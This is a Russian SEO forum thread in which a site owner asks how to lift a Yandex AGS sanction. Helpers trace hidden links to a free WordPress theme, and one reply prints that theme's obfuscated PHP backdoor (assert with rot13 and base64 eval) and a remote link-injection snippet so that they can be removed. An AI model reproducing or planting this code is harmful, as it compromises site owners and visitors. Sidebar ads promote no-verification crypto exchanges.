помогите АГС! Как выйти ?
Страницы: 1
помогите АГС! Как выйти ?, itcompanion.ru
Всем привет [IMG], я начинающий в теме продвижение сайтов, занимаюсь ремонтом компьютеров в Москве, начал делать сайт itcompanion.ru, продвигать уникальными статьями, их у меня примерно 160, каждая отвечает за определенный район Москвы, к примерно "компьютерная помощь пятницкое шоссе" выдает сразу мою статью на первой страницу в гугле, но в яндексе, сначало выдовало тоже на первой странице, теперь на мой сайт itcompanion.ru наложили санкции АГС. Хотелось бы это исправить, я изменил дизайн, убрал явно не читаемый текст, но это не помогает. Написал письмо в яндекс мне ответили 


Здравствуйте, Михаил!

После анализа Вашего сайта мы пришли к выводу, что он не в полной мере соответствует нашему представлению о качественных сайтах, отраженному в наших рекомендациях:
help.yandex.r...ndexing/quali.. ( help.yandex.ru/webmaster/yandex-indexing/quali.. )
company.yande...ation/index.xml ( company.yandex.ru/rules/optimization/index.xml ) 

Поэтому в настоящий момент значение тИЦ для Вашего сайта аннулировано ( help.yandex.r...-index/tic-ru.. ( help.yandex.ru/catalogue/citation-index/tic-ru.. ) ), и сайт может быть понижен в выдаче до тех пор, пока наши алгоритмы не сочтут его достаточно качественным. Информация об этом есть на странице нашего блога: webmaster.ya....l?item_no=18552 ( webmaster.ya.ru/replies.xml?item_no=18552 ) .

На решение алгоритмов могло повлиять множество факторов, таких как отсутствие оригинального и интересного контента, наличие списков поисковых запросов, использование SEO-ссылок ( webmaster.ya....xml?item_no=325 ( webmaster.ya.ru/replies.xml?item_no=325 ) ), чрезмерное использование рекламы и другие.

Следуйте нашим рекомендациям и развивайте свой проект для пользователей (наполняя его полезным контентом, повышая удобство использования сайтом, развивая различные дополнительные сервисы и т.п. на Ваше усмотрение). Это должно положительно сказаться на ранжировании сайта и величине тИЦ. При соблюдении всех условий санкции будут сняты автоматически.

--
С уважением, Платон Щукин
Служба поддержки Яндекса
help.yandex.ru/" ( help.yandex.ru/ )

Еще я проанизировал сайт каким то сервимос и мне показало ссылку на главной странице на другой стайт, 
maksim-club.ru/ ( maksim-club.ru/ ) 

После этого всего большинство страниц моего сайта, не на первой странице в яндексе а где то на 5й, и горит значек "Санкции яндекс" или фильтр АГС, подскажите как мне вывести мой сайт itcompanion.ru из под этого фильтра !?
Редактировать сообщение
переспам как причина
ком.jpg (229.35 КБ) [ Скачать ]
Цитата
Mikhail lukianenko пишет:
Всем привет [IMG], я начинающий в теме продвижение сайтов, занимаюсь ремонтом компьютеров в Москве, начал делать сайт itcompanion.ru, продвигать уникальными статьями, их у меня примерно 160, каждая отвечает за определенный район Москвы, к примерно "компьютерная помощь пятницкое шоссе" выдает сразу мою статью на первой страницу в гугле, но в яндексе, сначало выдовало тоже на первой странице, теперь на мой сайт itcompanion.ru наложили санкции АГС. Хотелось бы это исправить, я изменил дизайн, убрал явно не читаемый текст, но это не помогает. Написал письмо в яндекс мне ответили

"
Здравствуйте, Михаил!

После анализа Вашего сайта мы пришли к выводу, что он не в полной мере соответствует нашему представлению о качественных сайтах, отраженному в наших рекомендациях:
help.yandex.r...ndexing/quali.. [ help.yandex.ru/webmaster/yandex-indexing/quali.. ]
company.yande...ation/index.xml [ company.yandex.ru/rules/optimization/index.xml ]

Поэтому в настоящий момент значение тИЦ для Вашего сайта аннулировано ( help.yandex.r...-index/tic-ru.. [ help.yandex.ru/catalogue/citation-index/tic-ru.. ] ), и сайт может быть понижен в выдаче до тех пор, пока наши алгоритмы не сочтут его достаточно качественным. Информация об этом есть на странице нашего блога: webmaster.ya....l?item_no=18552 [ webmaster.ya.ru/replies.xml?item_no=18552 ] .

На решение алгоритмов могло повлиять множество факторов, таких как отсутствие оригинального и интересного контента, наличие списков поисковых запросов, использование SEO-ссылок ( webmaster.ya....xml?item_no=325 [ webmaster.ya.ru/replies.xml?item_no=325 ] ), чрезмерное использование рекламы и другие.

Следуйте нашим рекомендациям и развивайте свой проект для пользователей (наполняя его полезным контентом, повышая удобство использования сайтом, развивая различные дополнительные сервисы и т.п. на Ваше усмотрение). Это должно положительно сказаться на ранжировании сайта и величине тИЦ. При соблюдении всех условий санкции будут сняты автоматически.

--
С уважением, Платон Щукин
Служба поддержки Яндекса
help.yandex.ru/" [ help.yandex.ru/ ]

Еще я проанизировал сайт каким то сервимос и мне показало ссылку на главной странице на другой стайт,
maksim-club.ru/ [ maksim-club.ru/ ]

После этого всего большинство страниц моего сайта, не на первой странице в яндексе а где то на 5й, и горит значек "Санкции яндекс" или фильтр АГС, подскажите как мне вывести мой сайт itcompanion.ru из под этого фильтра !?
Редактировать сообщение
Там кнопка "Выход" должна быть!
Цитата
D-E-Z пишет:
переспам как причина
Как определить где есть переспам, а где нету? через какой сервис сделан этот скриншот что бы я мог проверить и исправить это?
Цитата
Abra Kadabra пишет:
Цитата
Mikhail lukianenko пишет:
Всем привет [IMG], я начинающий в теме продвижение сайтов, занимаюсь ремонтом компьютеров в Москве, начал делать сайт itcompanion.ru, продвигать уникальными статьями, их у меня примерно 160, каждая отвечает за определенный район Москвы, к примерно "компьютерная помощь пятницкое шоссе" выдает сразу мою статью на первой страницу в гугле, но в яндексе, сначало выдовало тоже на первой странице, теперь на мой сайт itcompanion.ru наложили санкции АГС. Хотелось бы это исправить, я изменил дизайн, убрал явно не читаемый текст, но это не помогает. Написал письмо в яндекс мне ответили

"
Здравствуйте, Михаил!

После анализа Вашего сайта мы пришли к выводу, что он не в полной мере соответствует нашему представлению о качественных сайтах, отраженному в наших рекомендациях:
help.yandex.r...ndexing/quali.. [ help.yandex.ru/webmaster/yandex-indexing/quali.. ]
company.yande...ation/index.xml [ company.yandex.ru/rules/optimization/index.xml ]

Поэтому в настоящий момент значение тИЦ для Вашего сайта аннулировано ( help.yandex.r...-index/tic-ru.. [ help.yandex.ru/catalogue/citation-index/tic-ru.. ] ), и сайт может быть понижен в выдаче до тех пор, пока наши алгоритмы не сочтут его достаточно качественным. Информация об этом есть на странице нашего блога: webmaster.ya....l?item_no=18552 [ webmaster.ya.ru/replies.xml?item_no=18552 ] .

На решение алгоритмов могло повлиять множество факторов, таких как отсутствие оригинального и интересного контента, наличие списков поисковых запросов, использование SEO-ссылок ( webmaster.ya....xml?item_no=325 [ webmaster.ya.ru/replies.xml?item_no=325 ] ), чрезмерное использование рекламы и другие.

Следуйте нашим рекомендациям и развивайте свой проект для пользователей (наполняя его полезным контентом, повышая удобство использования сайтом, развивая различные дополнительные сервисы и т.п. на Ваше усмотрение). Это должно положительно сказаться на ранжировании сайта и величине тИЦ. При соблюдении всех условий санкции будут сняты автоматически.

--
С уважением, Платон Щукин
Служба поддержки Яндекса
help.yandex.ru/" [ help.yandex.ru/ ]

Еще я проанизировал сайт каким то сервимос и мне показало ссылку на главной странице на другой стайт,
maksim-club.ru/ [ maksim-club.ru/ ]

После этого всего большинство страниц моего сайта, не на первой странице в яндексе а где то на 5й, и горит значек "Санкции яндекс" или фильтр АГС, подскажите как мне вывести мой сайт itcompanion.ru из под этого фильтра !?
Редактировать сообщение
Там кнопка "Выход" должна быть!
В смысле кнопка "Выход" ?
прежде чем ставить шаблоны, обычно каждый файл проверяется на наличие ненужного

ищите ссылку в файлах

Рисунок
Цитата
unix пишет:
прежде чем ставить шаблоны, обычно каждый файл проверяется на наличие ненужного

ищите ссылку в файлах


Я вроде все *.php проверил, ней пойму где оно лежит, а что за "Сокращение ссылок ( https://hec.su/ )" это мне адресовано?
Цитата
Mikhail lukianenko пишет:
Цитата
unix пишет:
прежде чем ставить шаблоны, обычно каждый файл проверяется на наличие ненужного

ищите ссылку в файлах


Я вроде все *.php проверил, ней пойму где оно лежит, а что за " Сокращение ссылок [ https://hec.su/ ]" это мне адресовано?

нет, это подпись.

скиньте тему архивом
Цитата
Шаблоны WordPress с портала wp-templates.ru имеют бесплатное распространение. Темы взяты из разделов свободного скачивания на сайтах авторов шаблонов, поэтому их копирование и использование не нарушает авторских прав.

Наш сайт помогает пользователям подобрать качественный шаблон для своего сайта. Взамен мы размещаем на сайтах, использующих шаблоны, скрытые или видимые ссылки, которые не портят внешний вид как шаблона, так и самого сайта, использующего данный шаблон.

Если вы хотите чтобы на вашем сайте не выводились партнерские ссылки, вам нужно отредактировать файл шаблона “comments.php”(иногда код находится в “footer.php”), удалив код:
<?php $lib_path = dirname(__FILE__).’/'; require_once(‘functions.php’); $links = new Get_links(); $links = $links->get_remote(); echo $links; ?>
https://yadi.sk/d/k7l7Ij4hgo4xr
Беглым взглядом посмотрел, ссылка есть в admin-interface.php и в comments.php удалите строку :
Код
<?php $lib_path = dirname(__FILE__).'/'; require_once('functions.php'); $links = new Get_links(); $links = $links->get_remote(); echo $links;
также там есть код:

Код
error_reporting(0); 
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUgcMvtuMJ1jqUxbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXFyxnJHbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXGgcMvtunKAmMKDbWTAsJlWVISEDK0SQD0IDIS9QFRSFH0IHVy0cXKgcMvujpzIaK21uqTAbXPVuYvS1VvkznJkyK2qyqS9wo250MJ50pltxK1ASHyMSHyfvH0AFFIOHK0MWGRIBDH1SVy0cXFy7WTZjCFWIIRLgBPV7sJIfp2I7WTZjCFW3nJ5xo3qmYGRlAGRvB319MJkmMKfxLmN9WTAsJlWVISEDK0SQD0IDIS9QFRSFH0IHVy07sJyzXTM1ozA0nJ9hK2I4nKA0pltvL3IloS9cozy0VvxcrlEwZG1wqKWfK2yhnKDbVzu0qUN6Yl8kZQxhZwZ2YwtkYwRjZF9aMKDhpTujC2D9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyASHyMSHy9BDH1SVy0hWS9GEIWJEIWoVyWSHIISH1EsIIWWVy0cYvVzqG0vYaIloTIhL29xMFtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cYvVzLm0vYvEwZP4vWzx9ZFMcpQ0vYvEsH0IFIxIFJlWFEH1CIRIsDHERHvWqYvVznQ0vYz1xAFtvAGxjZJSwZwt4MGDlAGR5AGV0MGt2Z2MzLmtjZ2SuZQDvYvEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqYvEsH0IFIxIFJlWVISEDK1IGEIWsDHqSGyDvKF4xLmNhVwRvXFx7L3IloS9mMKEipUDbWTZkYQDlYTMuoUAyXGgwqKWfK3AyqT9jqPtxLmRfZGx5ZGZfqUW1MFx7WTyvqvN9VPOwqKWfK2I4MJZbWTZkXGgwqKWfK2Afo3AyXPEwZFx7sJIfp2IcMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXG09ZFy7WTyvqvN9VTMcoTIsM2I0K2AioaEyoaEmXPWbqUEjBv8iZGN5YwVmAv44ZF4kZQRiM2I0YaObpQ9xCFVhqKWfMJ5wo2EyXPEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqXF4vWaH9Vv51pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXF4vWzZ9Vv4xLmNhVvMcCGRznKN9Vv4xK1ASHyMSHyfvHxIAG1ESK0SRESVvKF4vWzt9Vv5gMQHbVwH5ZQSuLmV4BTH0ZwHkBGHlATH4AwAzMzZ4ZQAuLGN0Vv4xK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKF4xK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0hWTZjYvVkVvxcB30tnJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOcMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVwuvMzEwMJZ4VvxtrlONLKAmMKW0XPEsHxIEIHIGISfvLlWqXGftsK0="));'));


скорее всего php шел с отправкой ваших данных (ip, браузер и т.д.)

попросите расшифровать пользователей
Цитата
Mikhail lukianenko пишет:
Как определить где есть переспам, а где нету? через какой сервис сделан этот скриншот что бы я мог проверить и исправить это?
просто открыл страницу и через Ctrl+F посмотрел сколько слова компьютер на странице
Цитата
unix пишет:
Беглым взглядом посмотрел, ссылка есть в admin-interface.php и в comments.php удалите строку :
Код
 <?php $lib_path = dirname(__FILE__).'/'; require_once('functions.php'); $links = new Get_links(); $links = $links->get_remote(); echo $links;     
 

Что я не нашел не один не второй код в файлах которые ты указал ( я открывал через текстовый документ и админку сайта
Цитата
Mikhail lukianenko пишет:
Цитата
D-E-Z пишет:
переспам как причина
Как определить где есть переспам, а где нету? через какой сервис сделан этот скриншот что бы я мог проверить и исправить это?
Семантический анализ текста онлайн, seo - анализ текста

Анализ контента сайта

Плотность ключей(тошнота), как ориентир 5-6 %, для молодых сайтов надо поменьше, для старых и авторитетных можно чуть больше.
Хотя есть мнение, что это сейчас не актуально и вопрос немного холиварный, но сам пользуюсь и вроде норм. smile:)

Ещё важно, чтобы весь контент был оригинальным, полезным и интересный пользователям.

Онлайн-сервис проверки текста на уникальность
ps рекомендации ПС надо изучать в первую очередь, один из учебников SEO находится тут
Изменено: fyodor - 25 Мая 2015 09:41
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
14:54 Одновременно пропал трафик с гугл и яндекса 
21:10 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
16:39 Партнерская программа OWNR WALLET 
15:11 Adtrafico - Правильная партнёрская сеть под бурж трафик 
11:50 Очень много 404 ошибок в вэбмастере!? 
03:48 3snet - гемблинг, беттинг, форекс, бинарные опционы, майнинг 
22:55 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options 
15:24 Профильный прогон 200 рублей, Тиц (Икс) от 10, проверен Checktrust 
14:36 Криптовалютный обменник Xgram.io - новое воплощение качества 
13:25 Обмен без AML и верификации Aztor.pro 
19:19 Ural-obmen.ru — выгодный сервис обмена 
19:04 Obama.ru - безопасный обмен криптовалют и электронных денежных средств 
12:17 Coin Click.cc - Быстрый и надежный обмен электронных валют в два клика 
11:51 Google Voice - OLD аккаунты "SMS и звонки" 
02:46 Точные прогнозы на футбол 
12:04 Как получить рефералов и посетителей на сайт бесплатно. 
18:31 Видимо, похороны СУПРа уже прошли как-то по-тихому 
12:48 Каспкрски ОС 
11:21 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди 
14:41 Бесплатный мини-аудит юзабилити и конверсии + технический SEO-аудит в подарок 
15:24 Добро пожаловать в цифровой мир...